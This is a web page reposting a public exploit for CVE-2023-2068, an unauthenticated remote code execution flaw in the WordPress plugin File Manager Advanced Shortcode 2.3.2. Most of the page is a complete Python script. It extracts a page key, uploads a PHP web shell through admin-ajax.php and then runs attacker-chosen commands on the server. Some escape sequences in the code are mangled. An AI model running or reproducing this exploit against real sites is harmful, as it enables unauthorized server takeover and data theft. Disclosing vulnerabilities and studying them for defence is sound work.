Home Tools Exploits & CVE's File Manager Advanced Shortcode 2.3.2 Remote Code Execution

File Manager Advanced Shortcode 2.3.2 Remote Code Execution

June 6, 2023

276

File Manager Advanced Shortcode version 2.3.2 suffers from a remote code execution vulnerability.

advisories | CVE-2023-2068

# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
# Date: 05/31/2023
# Exploit Author: Mateus Machado Tesser
# Vendor Homepage: https://advancedfilemanager.com/
# Version: File Manager Advanced Shortcode 2.3.2
# Tested on: WordPress 6.1 / Linux (Ubuntu) 5.15
# CVE: CVE-2023-2068

import requests
import json
import pprint
import sys
import re

PROCESS = "33[1;34;40m[*]33[0m"
SUCCESS = "33[1;32;40m[+]33[0m"
FAIL = "33[1;31;40m[-]33[0m"

try:
  COMMAND = sys.argv[2]
  IP = sys.argv[1]
  if len(COMMAND) > 1:
    pass
  if IP:
    pass
  else:
    print(f'Use: {sys.argv[0]} IP COMMAND')
except:
  pass

url = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panel
print(f"{PROCESS} Searching fmakey")

try:
  r = requests.get(url)
  raw_fmakey = r.text
  fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]
  if len(fmakey) == 0:
    print(f"{FAIL} Cannot found fmakey!")
except:
  print(f"{FAIL} Cannot found fmakey!")

print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')
url = "http://"+IP+"/wp-admin/admin-ajax.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}
data = "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="reqid"rnrnrn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="cmd"rnrnuploadrn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="target"rnrnl1_Lwrn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]"rnrnexploit.phprn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="action"rnrnfma_load_shortcode_fma_uirn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="_fmakey"rnrn"+fmakey+"rn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="path"rnrnrn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="url"rnrnrn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="w"rnrnfalsern"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="r"rnrntruern"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="hide"rnrnpluginsrn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="operations"rnrnupload,downloadrn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="path_type"rnrninsidern"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="hide_path"rnrnnorn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="enable_trash"rnrnnorn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="upload_allow"rnrntext/x-phprn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="upload_max_size"rnrn2Grn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="upload[]"; filename="exploit2.php"rnContent-Type: text/x-phprnrn<?php system($_GET['cmd']);?>rn"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1rnContent-Disposition: form-data; name="mtime[]"rnrnrn------WebKitFormBoundaryI52DGCOt37rixRS1--rn"
r = requests.post(url, headers=headers, data=data)
print(f"{PROCESS} Sending AJAX request to: {url}")
if 'errUploadMime' in r.text:
  print(f'{FAIL} Exploit failed!')
  sys.exit()
elif r.headers['Content-Type'].startswith("text/html"):
  print(f'{FAIL} Exploit failed! Try to change _fmakey')
  sys.exit(0)
else:
  print(f'{SUCCESS} Exploit executed with success!')
exploited = json.loads(r.text)
url = ""
print(f'{PROCESS} Getting URL with webshell')
for i in exploited["added"]:
  url = i['url']
print(f"{PROCESS} Executing '{COMMAND}'")
r = requests.get(url+'?cmd='+COMMAND)
print(f'{SUCCESS} The application returned ({len(r.text)} length):n'+r.text)

File Manager Advanced Shortcode 2.3.2 Remote Code Execution

Follow us on Instagram @thecyberpost

EDITOR PICKS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Doctor Appointment Management System 1.0 Cross Site Scripting

Kemp LoadMaster Unauthenticated Command Injection

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Zyxel Remote Command Execution

Senayan Library Management System 9.2.1 Cross Site Scripting

WordPress Modern Events Calendar 5.16.2 Shell Upload